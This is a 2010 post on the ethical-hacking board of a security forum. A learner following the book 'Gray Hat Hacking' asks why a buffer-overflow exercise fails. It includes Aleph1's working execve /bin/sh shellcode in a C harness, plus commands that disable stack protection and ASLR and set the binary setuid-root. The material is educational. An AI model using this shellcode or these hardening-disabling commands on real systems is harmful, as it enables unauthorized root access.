Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   shellcode question (http://www.go4expert.com/forums/shellcode-question-t21074/)

jacksmash 22Feb2010 20:59

shellcode question
 
Hi,

I recently bought a book called "Gray Hat Hacking." I've been able to get through the first 150 pages or so with no problem, but there is an exercise I'm having a bit of a tough time with. It seems that it should be pretty simple, so I thought I'd post what I'm doing and see if anyone has any insight.

First of all, the goal is to use a buffer overflow to obtain a root shell prompt.

The code is quite simple. I'll post it here:
Code:

char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31
\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31
\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main ()
{
  int *ret;
  ret = (int *)&ret + 2;
 
  (*ret) = (int)shellcode;
}

The point is to increment the return pointer to point to the saved return value on the stack. But there are a couple of tricks:

1. you have to run gcc with -fno-stack-protector since newer versions of gcc protect against stack smashing.

2. Recent linux build use ASLR to randomize stack memory calls, and so on my Ubuntu box it is important to first run the following command:

Code:

#echo "0" > /proc/sys/kernel/randomize_va_space
Now, when I compile the code above, and then run it, I get a segmentation fault. I've noticed that if I increment the return pointer by something other than "2", that I no longer get the fault, but I still do not get a root shell. In case you want to try it yourself, here are the steps:

Code:

# // do the following as root:
# gcc -fno-stack-protector shellcode.c
# chmod u+s a.out
# su <user_with_normal_privileges>
$ ./a.out
# // should have a root shell at this point

Please note that the c-code is Aleph1's shellcode, so I'm not copying something from the book that isn't already online.

If you have any insights that would be helpful for me to consider, I would be most grateful!!

Cheers.

jacksmash


All times are GMT +5.5. The time now is 02:47.